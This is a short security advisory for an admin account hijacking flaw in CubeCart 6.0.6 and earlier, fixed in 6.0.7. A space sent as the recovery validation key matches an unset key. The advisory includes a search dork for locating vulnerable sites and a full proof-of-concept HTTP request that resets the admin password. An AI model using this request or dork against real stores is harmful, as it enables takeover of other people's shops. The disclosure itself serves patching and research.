Application: CubeCart 6.0.6 > 5.2.12 Fixed: 07/09/2015 (6.0.7) Credits: Fernando Câmara @overflowy Title: Admin account hijacking vulnerability Dork: inurl:"index.php?_a=" Requirements: Default admin recovery functions enabled... Knowledge of the admin account email P.O.C Its possible for an attacker to access the admin pass recovery page without sending a recovery email previously. admin.php?_g=recovery The form asks us for a Validation Key , an Email and the new password. If a forgot password validation email is sent then the program saves the random generated key on the database on the admin user row. on the table CubeCart_admin_users Field: verify Type: varchar(32) Null: YES Default: NULL If a forgot password verification email is not sent then the default validation key according to the specified configuration of the field is NULL. If we input a space character (%20) the select query built in the function line 540 database.class.php will return results if the email is correct. The function at line 766 file database.class.php where() calls sqlSafe() declared in line 162 file mysql.class.php will quote our space character effectivly building a query with an empty string like this. SELECT admin_id,username WHERE email='admin@email.com' AND verify = ' '; -> an empty string The database recognizes the empty string as null. Just a simple request that would change an admin account password and redirect the attacker right to the control panel. POST /admin.php?_g=recovery HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/admin.php?_g=recovery Cookie: PHPSESSID=lqc12qi1i5o5sl0jtbqt5747k7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 154 validate=%20&email=admin%40email.com &password%5Bnew%5D=newpass&password%5Bconfirm%5D=newpass&login=Submit&token=62a83c672e2763529b46fd8978ac9451